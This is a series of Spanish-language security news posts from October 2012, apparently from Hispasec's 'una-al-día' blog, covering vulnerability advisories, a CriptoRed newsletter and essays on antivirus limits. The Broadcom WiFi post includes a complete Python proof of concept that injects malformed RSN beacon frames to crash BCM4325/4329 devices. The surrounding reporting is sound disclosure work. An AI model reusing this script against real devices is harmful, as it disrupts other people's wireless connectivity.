miércoles, 31 de octubre de 2012

Nuevos contenidos en la Red Temática CriptoRed (octubre de 2012)


Breve resumen de las novedades producidas durante el mes de octubre de 2012 en CriptoRed, la Red Temática Iberoamericana de Criptografía y Seguridad de la Información.

1. NUEVOS DOCUMENTOS EN LA RED TEMÁTICA EN EL MES DE OCTUBRE DE 2012
1.1.  Lección 8 del curso El algoritmo RSA: Ataque por factorización (MOOC Crypt4you, Jorge Ramió, España)

2. DOCUMENTOS RECOMENDADOS DE OTROS SERVIDORES EN EL MES DE OCTUBRE DE 2012
2.1. Protección de datos personales. Una lectura técnico jurídica de la inseguridad de la información (Jeimy Cano, Blog IT-Insecurity, Colombia)
2.2. Libro Inseguridad de la información (Jeimy Cano, Colombia)
2.3. Optimizing ISO/IEC 27001 Using O-ISM3 (Jim Hietala y Vicente Aceituno, España)
2.4. Motivación criminal en línea. Una ecuación de la inseguridad de información (Jeimy Cano, Blog IT-Insecurity, Colombia)
2.5. Informe del Tercer Trimestre del año 2012 de la Red de Sensores sobre virus y malware (INTECO España)
2.9. Informe de la Red de Sensores del mes de septiembre de 2012 sobre virus y malware (INTECO, España)
2.10. La inseguridad de la información: motivador de prácticas de cumplimiento empresarial (Jeimy Cano, Blog IT-Insecurity, Colombia)

3. RELACIÓN CRONOLÓGICA DE CONGRESOS, SEMINARIOS Y CONFERENCIAS DESTACADAS
3.1. Noviembre 2 al 3 de 2012: Novena Edición del Congreso No cON Name 2012 (Barcelona - España)
3.2. Noviembre 21 de 2012: XXV Congreso y Feria Iberoamericana de Seguridad de la Información (Madrid - España)
3.3. Noviembre 26 al 30 de 2012: VII Congreso Internacional de Telemática y Telecomunicaciones CITTEL 2012 (La Habana - Cuba)
3.4. Noviembre 28 al 30 de 2012: IADIS International Conference on Internet Technologies & Society 2012 (Perth - Australia)
3.5. Diciembre 12 al 13 de 2012: 4th International Symposium on Cyberspace Safety and Security CSS 2012 (Melbourne - Australia)
3.6. Marzo 13 al 16 de 2013: IADIS International Conference e-Society 2013 (Lisboa - Portugal)
3.7. Marzo 18 al 22 de 2013: XI Seminario Iberoamericano de Seguridad en las Tecnologías de la Información (La Habana - Cuba)
3.8. Abril 3 al 5 de 2013: Computational Intelligence for Risk Management, Security and Defence Applications EvoRISK (Viena - Austria)
3.9. Abril 17 al 18 de 2013: Security Forum (Barcelona - España)
Más información en:

4. FUE TAMBIÉN NOTICIA EN LA RED TEMÁTICA EN EL MES DE OCTUBRE DE 2012
4.1. Seminario sobre Protección de Datos e Innovación de la Cátedra CEU Google(8 de noviembre, España)
4.2. Edición veintiséis del Diplomado en Seguridad de la Información de la UNAM (23 de noviembre, México)
4.3. Security Forum del 17 al 18 de abril de 2013 en Barcelona (España)
4.4. XIV edición del Diplomado en Seguridad en Tecnología Informática y Telecomunicaciones STIT (12 de noviembre, Venezuela)
4.5. Segunda edición del curso online gratuito de Criptografía de Dan Boneh en MOOC Coursera (5 de noviembre, USA)
4.6. Convocatoria de Premios Security Forum 2013 a proyectos de investigación en seguridad (España)
4.7. La revista Red Seguridad presenta su nuevo servidor Web (España)
4.8. XXV Congreso y Feria Iberoamericana de Seguridad de la Información SEGURINFO 2012 en Madrid (21 de noviembre, España)
4.9. Sexto Encuentro Internacional de Seguridad de la Información ENISE en León (España)
4.10. Disponible la octava Lección del Algoritmo RSA en el MOOC Crypt4you de Criptored (España)
4.11. Seminario Seguridad en dispositivos Blackberry, Iphone y Android, en entornos corporativos en Buenos Aires (Argentina)
4.12. Curso de Perito Informático Forense en la Universidad Politécnica de Valencia (España)
4.13. Postgrado Experto Universitario en Seguridad en Tecnologías de la Información y las Comunicaciones en la Universidad de Sevilla (España)
4.14. Avance sobre el informe primera encuesta enseñanza SI en Iberoamérica y lanzamiento de la segunda encuesta (España)
4.15. Segunda edición de la 8.8 Computer Security Conference sobre hacking en Santiago (Chile)
4.16. Actualizada la sección multimedia del servidor de Criptored con acceso a 85 vídeos de seguridad en castellano (España)
4.17. VI Jornada de Derecho y Delitos Informáticos de CXO Community (Argentina)
4.18. Intypedia cumple dos años superando las 215.000 reproducciones de sus vídeos (España)
4.19. Cuarta edición de Asegur@ IT Camp en El Escorial (España)
4.20. Publicadas en revista IEEE Latin America Transactions 7 ponencias del congreso CIBSI 2011 (Colombia)
Acceso al contenido de estas noticias:

5. ENCUESTA SOBRE ENSEÑANZA DE LA SEGURIDAD
5.1. Segunda encuesta Iberoamericana sobre la enseñanza de postgrado en Seguridad de la Información

6. OTROS DATOS DE INTERÉS Y ESTADÍSTICAS DE LA RED TEMÁTICA
6.1. Número actual de miembros en la red: 922
6.2. Estadísticas Criptored: 43.144 visitas, con 132.062 páginas solicitadas y 42,59 Gigabytes servidos en octubre de 2012, descargándose 33.310 archivos zip o pdf. Con 139 seguidores en facebook y 1.364 seguidores en twitter.
6.3. Estadísticas Intypedia: 10.584 reproducciones de vídeos en octubre de 2012. Con 1.158 seguidores en facebook y 820 seguidores en twitter.
6.4. Estadísticas Crypt4you: 8.702 accesos en octubre de 2012. Con 452 seguidores en facebook y 384 seguidores en twitter.


Jorge Ramió Aguirre
Coordinador de Criptored

martes, 30 de octubre de 2012

Ejecución remota de código en RealPlayer


Se ha publicado una vulnerabilidad en la última versión de RealPlayer que podría permitir ejecutar código arbitrario si se abre un fichero especialmente manipulado.

RealPlayer es un reproductor multimedia de la empresa RealNetworks capaz de reproducir multitud de formatos de audio y vídeo como  MP3, MP4, WMA, WAV, AAC, AVI, MOV, WMV, 3GP y RM.

La vulnerabilidad que afecta a RealPlayer está causada por un error al procesar ficheros .3GP y .3G2 que podría causar un desbordamiento de memoria y permitir la escritura en zonas en las que no se dispone de acceso. Aprovechando este error un atacante remoto podría lograr la ejecución de código arbitrario con los permisos del usuario que lanza el reproductor multimedia. La víctima debería reproducir un fichero de vídeo especialmente manipulado para poder reproducir la vulnerabilidad.

La vulnerabilidad ha sido reportada por eEye Digital Security, y afecta a la versión actual de RealPlayer, la 15.0.6.14.

Existe una prueba de concepto publicada por 'coolkaveh', en forma de fichero .3G2, que provoca una corrupción de memoria y posterior cierre del reproductor.

Más información:

RealPlayer 3GP/3G2 File Handling Memory Corruption



Juan José Ruiz


lunes, 29 de octubre de 2012

Vulnerabilidades en productos Mozilla


Se han publicado tres vulnerabilidades en productos Mozilla relacionadas con el objeto 'Location' que podrían permitir a un atacante remoto realizar ataques Cross-Site Scripting o evadir restricciones de seguridad. Afectan a al navegador Firefox, al gestor de correo Thunderbird y la suite SeaMonkey.

Mozilla ha publicado un boletín de seguridad de carácter crítico alertando de tres vulnerabilidades en sus productos estrellas Firefox, Thunderbird y SeaMonkey.

La primera de ellas ha sido descubierta por Mariusz Mlynski e identificada como CVE-2012-4194. Se trata de un error a la hora de proteger el valor del objeto 'window.location' que podría ser simulado mediante el método 'valueOf' y utilizarse para realizar ataques Cross-Site Scripting (XSS) de forma remota. Thunderbird solo se vería afectado a través de RSS y complementos que carguen contenido web.

La vulnerabilidad con CVE-2012-4195 ha sido descubierta por 'moz_bug_r_a4' y se basa en un error en la función 'CheckURL' en 'window.location' al no determinar correctamente el documento llamado en los valores de retorno. Esto podría ser aprovechado para realizar ataques XSS y ejecutar código HTML y Javascript arbitrario en el navegador de un usuario.

Por último, Antoine Delignat-Lavaud del equipo de investigación Prosecco descubrió cómo eludir las protecciones de seguridad 'Same Origin' y acceder al objeto 'Location' usando un ataque de inyección de propiedades. A esta vulnerabilidad se le ha asignado el identificador CVE-2012-4196.

Estos errores han sido corregidos en las versiones 16.0.2 de Firefox y Thunderbird, y en SeaMonkey 2.13.2. Es posible descargar estas versiones desde la página oficial y el FTP de Mozilla.

Más información:

Mozilla Foundation Security Advisory 2012-90 - Fixes for Location
object issues

Location can be spoofed using valueOf

nsLocation::CheckURL can use the wrong principal

More cross origin location access problems



Juan José Ruiz

domingo, 28 de octubre de 2012

Una al día cumple 14 años


Una al día nació el 28 de octubre de 1998. En estos días se cumple el decimocuarto aniversario de "una-al-día", primer diario de información técnica sobre seguridad informática en español. Ya llevamos 14 años informando diariamente sobre malware, vulnerabilidades, fraudes, alertas, y reflexiones sobre la seguridad en Internet.

Solemos hacer algo especial en los aniversarios. O bien aprovechamos para realizar algún concurso y regalar libros o camisetas, o bien introducimos alguna novedad en una-al-día (como por ejemplo el año pasado, en la que se convirtió en un blog con comentarios públicos). Este año cambiamos la página web de Hispasec. Su estética no ha sido muy diferente en los últimos 14 años. Comenzó como un punto común en el que alojar las una-al-día, con un estilo muy acorde con los tiempos (1999).

Imagen de la web de Hispasec en sus inicios en 1998

Para ver otro cambio sustancial en la web, tenemos que remontarnos a febrero de 2003 donde, ya como empresa, se estilizó la página.

Hispasec se veía de esta forma en 2003

Luego, simples mejoras sutiles.

Algunos cambios...

El último cambio más o menos notable se realizó a principios de 2009, que se ha prolongado hasta hoy.

El último cambio mantenido hasta el día de hoy

Ahora, cuando el boletín cumple 14 años ininterrumpidos, cambiamos radicalmente el modelo web para mejorar la estética y ordenar mejor la información. Eso sí, tanto Hispasec como una-al-día seguirán como siempre, tanto en contenido como en forma. Como hasta ahora, vamos a mantener el boletín por correo (en texto plano y firmado, como señas de identidad). Aunque seguimos peleándonos con la saturación de información que proporciona la web 2.0, intentado diferenciarnos en cuestión de calidad técnica e independencia de los artículos. Sigue intacta la capacidad de decir lo que queramos cuando queramos, sin ningún tipo de presiones. Lo que nos resulta mucho más complicado en estos días es ser los primeros (o a veces incluso puntuales) a la hora de ofrecer la información. Existen ahí fuera excelentes blogs, cuentas en Twitter, Facebook y páginas dedicadas a la seguridad que ofrecen un alto grado de inmediatez... y nos parece estupendo porque es el lector el que finalmente sale ganando con tanta oferta. Estamos muy orgullosos de seguir produciendo una-al-día y poder ofrecerla a nuestros suscriptores, que entre todos los canales de distribución suman muchas decenas de miles.

Como siempre decimos, gracias a todos. En especial, a nuestros fieles suscriptores: desde la primera persona que leyó el boletín en octubre de 1998, hasta el usuario del último correo que se ha suscrito al servicio hace apenas unos minutos.
  

 Sergio de los Santos
Twitter: @ssantosv

sábado, 27 de octubre de 2012

Denegación de servicio a multitud de Smartphones via WiFi


Se ha publicado una vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo.

La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, del que hizo pública demostración durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional.

Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos, a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas.

El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2.

En coordinación con los investigadores y el US-CERT, Broadcom facilitó a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia, Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, por lo que se da como subsanada.

Los dispositivos afectados con el chipset BCM4325:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge

Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad

Y la prueba de concepto realizada por Matias Eissler:

------------------------- poc.py -------------------------
#!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
    sequence = 0
    while(1):
        sequence = sequence % 4096

        # Frame Control
        frame  = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
        frame += '\x00' # Flags: 0
        frame += '\x00\x00' # Duration: 0
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
        # Frame Body
        frame += struct.pack('Q', time.time()) # Timestamp
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
        frame += '\x11\x04' # Capability Information: ESS, Privacy,
Short Slot time
        # Information Elements
        # SSID: buggy
        frame += '\x00\x05buggy'
        # Supported Rates: 1,2,5.5,11,18,24,36,54
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
        # DS Parameter Set: 6
        frame += '\x03\x01\x06'
        # RSN IE
        frame += '\x30' # ID: 48
        frame += '\x14' # Size: 20
        frame += '\x01\x00' # Version: 1
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
        frame += '\x01\x00' # Pairwise cipher suite count: 1
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
        frame += '\xff\xff' # Authentication suites count: 65535
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
        frame += '\x00\x00'

        sequence += 1
        yield frame

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:"
        print "\t%s <wireless interface>" % sys.argv[0]
        sys.exit(-1)

    iface = sys.argv[1]
    context = PyLorcon2.Context(iface)
    context.open_injmon()

    generator = beaconFrameGenerator()

    for i in range(10000):
        frame = generator.next()
        time.sleep(0.100)
        context.send_bytes(frame)



Más información:

VU#160027: Broadcom BCM4325 and BCM4329 wireless chipset
denial-of-service vulnerability

Broadcom DoS on BCM4325 and BCM4329 devices

One firmware to monitor 'em all


José Mesa Orihuela

viernes, 26 de octubre de 2012

Acceso remoto a ficheros arbitrarios en SAP NetWeaver


Se ha publicado una vulnerabilidad en SAP NetWeaver que podría permitir a un atacante remoto leer cualquier archivo del sistema afectado.

NetWeaver es una plataforma compuesta por todas las aplicaciones SAP, que tiene el objetivo de lograr una mejor integración entre ellas, utilizar estándares para asegurar la interoperabilidad, aportar flexibilidad, y reducir costes. SAP NetWeaver es ampliamente utilizado en el mundo empresarial.

La vulnerabilidad está provocada por un error en el parser PMI XML cuando valida peticiones XML. Un atacante podría aprovechar este problema para leer cualquier archivo local.

SAP ha publicado un aviso (SAP Note 1721309) en el que informa sobre esta vulnerabilidad.

Más información:

SAP Note 1721309

ERPScan (DSECRG-12-037):


Antonio Ropero
Twitter: @aropero


jueves, 25 de octubre de 2012

Los antivirus acortan la vida del malware bancario... ¿y qué?

SurfRight ha publicado una noticia interesante. A través de su producto HitmanPro, ha realizado un estudio durante un año en 2.5 millones de usuarios. Ha determinado que el malware más peligroso (familias conocidas de troyanos bancarios) perduran de media en un sistema con antivirus 25 días y si no lo tiene, 81. ¿Qué se puede deducir de estas cifras?

HitmanPro es una especie de antivirus en la nube. 2.5 millones de usuarios lo han descargado y han analizado con él su sistema como protección adicional. Este programa hizo lo siguiente: detectaba la existencia de troyanos bancarios: Zeus, Citadel, SpyEye y Tinba. Si los encontraba, determinaba desde cuándo estaban ahí (fecha de instalación) y si el usuario mantenía corriendo otro antivirus. Después lo limpiaba.

Así, han determinado que el sistema con antivirus alojaba el troyano desde hacía 25 días de medía, y el que no tenía antivirus, unos 81... Nos preguntamos cómo han confirmado la fecha de infección porque, aunque se puede conocer con cierta seguridad, es muy raro que los binarios utilicen la fecha real de creación... suele estar manipulada. Pero no se tienen muchos más detalles técnicos.

Lo primero es tener claro que este es un estudio de una casa antivirus, creado con la intención clara de vender su producto y mostrar su eficacia. Por tanto, no debe ser tomado como imparcial, pero sí como un experimento curioso.

¡25 días oculto incluso con antivirus es mucho tiempo!

Claro. Y aun así no hay que olvidar que el producto HitmanPro por definición no debe ser infalible, por lo que seguro que no han detectado todos los troyanos de estas características en los equipos analizados. Muchos de esos usuarios, después de escanear con ese programa, seguirán infectados.

Estos 25 días de media de infección con antivirus activos no demuestran la ineficacia del antivirus, sino la sofisticación del malware. Además, esconde algo interesante: el malware, ni se molesta en desactivar a su enemigo. Una vez instalado en el sistema, el malware podría intentar desactivar el motor residente o al menos bloquear sus actualizaciones. Técnicamente, no es complicado (aunque también habría que valorar que esto introduce una pista para delatar su existencia). Aunque algunas familias lo hacen, en concreto no es habitual verlo en estos troyanos bancarios. ¿Por qué? Porque confían tanto en su propia capacidad de perpetuación en el sistema (y tan poco en la efectividad de los antivirus), que no se preocupan de que en él conviva un antimalware que, tarde o temprano podría cazarlo.

¿81 días infectado es peor que 25?

Puede ser un consuelo. Pero en realidad, ¿qué tiempo de infección es aceptable? Por parte del antivirus, una vez infectado, queda demostrado que ha fallado en su capacidad de descubrir el exploit (si lo hubiera), las heurísticas y detectar el comportamiento. Tan solo le queda actualizar las firmas y esperar que se realice un análisis del equipo. La mayoría de los antivirus actualizan sus firmas varias veces al día, por lo que el sistema de firmas, parece que tampoco es suficiente.

Para el troyano, esos 25 días de media o periodo de infección, les son más que suficientes. Desde el punto de vista del atacante, el tiempo necesario para que un troyano de estas características sea efectivo y cumpla su función depende de los hábitos del usuario. Lo que quiere es que se conecte a su banco online, así que el periodo de consulta de su banca online (¿diario? ¿semanal?) es su límite. Durante esos 25 días, los habituales de la banca electrónica la usarán, y en ese momento se verán afectados y el troyano intentará robar sus cuentas. Objetivo cumplido.

Por tanto, efectivamente 81 es mejor que 25... pero si hablamos de troyanos bancarios de este tipo, siempre que el periodo de infección sea más largo que el hábito de consulta de banca online con el sistema afectado... no será determinante el número de días que conviva el equipo con el malware. Lamentablemente, la detección más "efectiva" (por habitual) en estos casos, suele ser la constatación de un descubierto en la cuenta bancaria.

Más información:

Antivirus shortens the life-time of financial malware


Sergio de los Santos
Twitter: @ssantosv



miércoles, 24 de octubre de 2012

Acceso no autorizado a la administración SNMP de Switches 3Com, HP y H3C


Se ha anunciado una vulnerabilidad en la configuración SNMP de switches 3Com, HP y H3C que podría permitir a un usuario remoto realizar acciones administrativas en los sistemas afectados.

Un usuario remoto con conocimiento de la comunidad pública SNMP puede acceder a datos sensibles (como nombres de usuario y contraseñas) de los objetos MIB (Management Information Base o Base de Información de Administración) h3c-user.mib y hh3c-user.mib a través de SNMP. Una vez que el atacante accede a esta información, podría emplearla para tomar el control de los dispositivos afectados.

La lista de productos afectados es inmensa, se eleva a más de 750 modelos diferentes entre las tres marcas, por lo que se recomienda consultar el aviso oficial publicado por HP:
La vulnerabilidad tiene asignado el CVE-2012-3268 con un CVSS de 9.3. Se han publicado actualizaciones para gran parte de los productos, así como contramedidas efectivas para todos los dispositivos, disponibles a través del aviso de HP.

Más información:

HPSBHF02819 SSRT100920 rev.1 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information


Antonio Ropero
Twitter: @aropero

martes, 23 de octubre de 2012

Envenenamiento de cabeceras en Django 1.3 y 1.4

Django, framework de desarrollo web basado en Python ha actualizado las ramas 1.3 y 1.4 para dar solución a una vulnerabilidad que podría, mediante técnicas de envenenamiento de cabeceras ("Header poisoning"), redireccionar a un usuario a un sitio malicioso o incluso el robo de credenciales.

Para realizar algunas operaciones, Django extrae el nombre del dominio de la cabecera "Host" enviada. La vulnerabilidad (CVE-2012-4520) reside en el parser del método django.http.HttpRequest.get_host(), que extrae esta cabecera "Host" incorrectamente.

Una cabecera válida tendría el siguiente formato:

Host: example.com

Si a Django se le proporciona una petición con esta cabecera manipulada, como por ejemplo:


Django extraerá y entenderá que el dominio deseado es "example2.com" en lugar de "example.com", que es el correcto.

Un caso particular de ataque se produciría en el caso de restablecer la contraseña del usuario. Un atacante podría simular una petición de nueva contraseña con la cabecera Host especialmente manipulada, y que a la víctima le llegase un confirmación (o nueva contraseña) con un texto similar a "Visite http://example2.com/login para..." en lugar de aparecer el dominio legítimo. Si este usuario (que en realidad no ha solicitado nada) picase, introduciría sus datos en otro dominio. Esto ocurriría tanto en con el gestor de usuarios integrado de Django, o con cualquier aplicación de este tipo realizada con Django.http.HttpRequest.get_host.

Además del fallo descrito, se ha actualizado la documentación debido a la incorrecta descripción del método HttpResponse.set_cookie(), que podría facilitar ataques XSS en las webs que implementaran incorrectamente este método. La documentación de Django 1.4, que argumentaba incorrectamente que el método HttpResponse.set_cookie() establecía siempre la propiedad HttpOnly para todas las cookies (propiedad que añade protección adicional ante ataques XSS de scripts maliciosos). Ahora se advierte que sólo lo hace para las cookies de sesión.

Se recomienda actualizar a las versiones correspondientes de cada rama, 1.3.4 o a la 1.4.2.

Más información:

Django - Security releases issued

Fixed a security issue related to password resets

Django 1.3.4

Django 1.4.2



Antonio Sánchez

lunes, 22 de octubre de 2012

Adobe soluciona seis vulnerabilidades críticas en Shockwave Player

Adobe Systems ha publicado un nuevo boletín de seguridad (APSB12-23) que soluciona seis vulnerabilidades críticas en Shockwave Player.

Shockwave es la tecnología desarrollada inicialmente por Macromedia y posteriormente comprada y ampliada por Adobe para la creación y reproducción de contenidos multimedia y juegos. Aunque no es tan popular como Flash, todavía es ampliamente utilizado para juegos online y presentaciones, tanto en plataformas Windows como Macintosh.

Las vulnerabilidades, relacionadas con desbordamientos de memoria producidos en el reproductor, permitirían a los atacantes la ejecución remota de código, a través de ficheros Shockware (.DCR) especialmente manipulados. Los CVEs completos son los siguientes: CVE-2012-4172, CVE-2012-4173, CVE-2012-4174, CVE-2012-4175, CVE-2012-4176, CVE-2012-5273

Adobe recomienda actualizar a la versión 11.6.8.638 de Shockwave Player, disponible desde:

Más información:

Security update available for Adobe Shockwave Player




José Mesa Orihuela

domingo, 21 de octubre de 2012

Salto de restricciones en las versiones móviles de Dropbox y Google Drive

En la última versión de las aplicaciones para móviles de Dropbox y Google Drive se ha corregido un problema de salto de restricciones. Se han visto afectadas tanto las versiones para iOS como Android.

El investigador en seguridad de IBM, Roi Saltzman (@roisa) ha publicado su análisis sobre una vulnerabilidad presente en las versiones de Android e iOS de Dropbox y Google Drive, aplicaciones utilizadas para la sincronización y acceso remoto de documentos y ficheros.

Las versiones afectadas, que se ya se encuentran actualizadas, son:
* DropBox 1.4.6 (iOS)  y 2.0.1 (Android)
* Google Drive 1.0.1 (iOS)

El fallo residía en una incorrecta gestión de las zonas de seguridad del navegador que permitía a scripts especialmente manipulados, ejecutarse con permisos de zonas privilegiadas del dispositivo (Cross-Zone Scripting).

Este es un ejemplo típico que ocurría en los navegadores de escritorio hace años. A través de ciertos scripts se permitía que el contenido originado desde la zona de "Internet" (que no debería disponer de muchos privilegios) se lanzara en la zona local (que dispone de mayores privilegios sobre el sistema, como por ejemplo a ficheros de sistema).

La vulnerabilidad se presentaba exactamente en las clases UIWebView/WebView de iOS/Android respectivamente, que permiten utilizar un navegador embebido dentro de otra aplicación a modo de ventana para renderizar el contenido HTML, y en el modo que permitían tanto ejecutar automáticamente el código javascript presente en ese HTML como lanzarlo en una zona con permisos diferentes a la original. Con esto se obtiene acceso al DOM del navegador y se podría robar información sensible o tener acceso al sistema de ficheros al lanzarse desde una zona privilegiada (file://).

Para reproducir esta vulnerabilidad sólo seria necesario leer un fichero HTML especialmente manipulado. El atacante obtendría acceso a cualquier fichero que la aplicación pudiese leer. Dependiendo del sistema operativo, incluso podría llegar más lejos. Por ejemplo en iIOS se podrían robar las credenciales de Dropbox.

El investigador ha proporcionado el siguiente código como prueba de concepto:


























Para solucionar la vulnerabilidad deben actualizarse a las últimas versiones disponibles:

Dropbox:

Google Drive:

Más información:

Old Habits Die Hard: Cross-Zone Scripting in Dropbox & Google Drive Mobile Apps:



José Mesa Orihuela




sábado, 20 de octubre de 2012

Antivirus y el manejo de las expectativas

A una señora en Murcia que regenta un locutorio, le han realizado una transferencia de 2800 euros hacia la cuenta de un desconocido sin su consentimiento. El banco se niega a devolverle el dinero. Ha sido víctima de una variante de Citadel, el de la transferencia ficticia. Entre lágrimas por haber perdido la recaudación del mes, nos pregunta desesperada: "¿Pero cómo ha podido ocurrir? No lo entiendo, ¡tengo un antivirus! ¡No es pirata!"

Un bufete de arquitectos en Barcelona nos contacta. Desde su proveedor han detectado un tráfico muy sospechoso que proviene de la red interna. Es probable que se esté filtrando información. Preocupados, se ponen en contacto con nosotros: "Estamos protegidos con un antivirus. Hemos analizado cada máquina incluso con otra marca y también nos dice que estamos limpios. ¿Qué demonios está pasando?".

Estos son solo dos ejemplos reales de nuestro día a día. En ambos casos, los forenses indicaron infecciones comunes en el sistema. Nada de amenazas dirigidas: malware común, del que infecta a millones de máquinas cada día. Se habían infectado a través de una vulnerabilidad en un plugin del navegador. En los dos casos se detectó el malware, y se eliminó. Y en los dos casos (y en cualquier forense realizado, en general), efectivamente disfrutaban de la protección de un antivirus reconocido, actualizado, activo y plenamente funcional que ofrecía todo tipo de protección.

¿Crisis antivirus?

Los antivirus comenzaron (y siguen) usando tecnología de firmas. Mejoraron con la heurística, que se demostró insuficiente. Incorporaron incluso análisis de comportamiento y además, reconocimiento en la nube con millones de ficheros en listas blancas y negras de reputación en tiempo real. ¿El resultado? Además de estos ejemplos comunes en nuestro laboratorio, según el estudio del Observatorio de INTECO con el que colaboramos, los niveles de malware encontrado en unos 3000 usuarios analizados mensualmente en España rondan desde hace años el 50% de equipos que alojan al menos una muestra. De ellos, el 95% suele usar antivirus. No parece muy alentador. Pero el antivirus no está en crisis.

Las expectativas

La pregunta de los usuarios es normal. Me han vendido un producto que no ha cumplido su función, por tanto, en su lógica, el producto es el culpable. Y efectivamente, el antivirus ha fallado... pero el problema reside realmente en las expectativas. Cuando se adquiere un producto, se espera que cumpla la función que promete y se crean por tanto unas expectativas que, una vez incumplidas, se sienten como deudas. Pero quizás nosotros mismos (ayudados, eso sí, por la publicidad y nuestra interiorización de sus mensajes) hemos generado esas expectativas exageradas.

Depende de en qué plano nos movamos, estamos más expuestos a generar expectativas increíbles. Si bien no esperamos que al comprar determinada marca de desodorante, chicas espectaculares caigan a nuestros pies por el simple hecho de oler mejor y que un anuncio lo asegure, en el plano de la tecnología el usuario es más vulnerable en este aspecto: si la publicidad del antivirus dice que me protege, espero protección. Protección total, y no a medias. Pero la realidad es diferente. Como hemos mencionado en otra ocasión, el antivirus es un chaleco antibalas... pero hoy en día, los atacantes han aprendido tanto a disparar a la cabeza, como a atravesar el material del que están hechos. Si un coche cae por un barranco, explota y se consume en llamas, ningún testigo gritaría ante el cuerpo calcinado del conductor: "¡¿Pero si usaba un cinturón de seguridad, cómo ha podido ocurrir!?".

Un cambio en las expectativas

Más que culpar a un producto, se debe generar un cambio de expectativas en el usuario medio. Los atacantes llevan ventaja. Desde (¿y para?) siempre. Actualmente, la fórmula por la que crean archivos únicos que solo funcionan en el equipo de la víctima, (cifrados exclusivamente para ese ordenador con criptografía simétrica basada en parámetros únicos del sistema), dificulta muchísimo tanto su detección, como la extrapolación a ningún tipo de lista para compartirla con otros usuarios. También complica el análisis, así que es más complejo crear una firma y que se detecten muestras similares. Para colmo, otros problemas más prosaicos como la escasez de personal en los laboratorios en épocas de crisis, ralentizan las investigaciones antivirus. Y aunque todo esto se solucionara, los atacantes seguirán con ventaja. Afrontémoslo.

El usuario debe aprender entonces a esperar lo que de verdad puede conseguir de cada tecnología. El corrector ortográfico de Word no se hace llamar "antierrores ortográficos", ni nos convierte automáticamente en un académico de la lengua. Solo nos ayuda a detectar fallos comunes. Para escribir bien y que no se cuelen errores en nuestros párrafos, es necesario usar otras "herramientas": entender la gramática y mejorarla con la lectura de calidad. Jamás se inventará el corrector que consiga eso por nosotros.  Probablemente, el antivirus debería llamarse "detector (de algunos tipos) de malware" para reforzar la idea de que es necesaria otro tipo de protección adicional y rebajar las expectativas en este campo... pero probablemente los de marketing no estarían muy de acuerdo.

¿Y qué tipo de protección adicional es necesaria?

Desde luego, superar el binomio clásico "antivirus y cortafuegos entrante" tan incompleto y obsoleto. Una buena medida es conocer y activar las opciones de seguridad de Windows, y otra muy interesante que ha aparecido últimamente, son los programas antiexploits. No me refiero a la detección de exploits que también intentan los antivirus (con éxito relativo, como ocurre con la detección de malware). Este tipo de software se preocupa del malware en otro plano: detectan las técnicas de intentos de explotación de vulnerabilidades que hacen que se instale el malware, no del malware en sí (para eso estaría el antivirus). Y dan buenos resultados. EMET, la herramienta de Microsoft es una buena prueba de ello, y personalmente estoy seguro de que acabará integrada de serie en futuras ediciones de Windows. ExploitShield es otro gran programa aparecido recientemente. Intenta impedir que los exploits lleguen a ejecutar código, basado en su comportamiento esencial. Es muy efectivo.

Para hacernos una idea de que este es un problema que hay que atajar, de ese 50% de sistemas infectados del que hemos hablado, sí, un 95% usa antivirus... pero solo un 60% suele tener actualizados todos sus programas...

Por supuesto, si se popularizan los programas antiexploit, no serán la solución definitiva y tendrán que evolucionar... Pero parecen un buen camino, hoy. Desprendámonos de consejos obsoletos. Actualmente, los exploits y las vulnerabilidades en software no actualizado representan una buena parte del problema. No seamos víctimas de nuestras propias expectativas.


Sergio de los Santos
Twitter: @ssantosv




viernes, 19 de octubre de 2012

Actualización del kernel para Red Hat Enterprise Linux 6

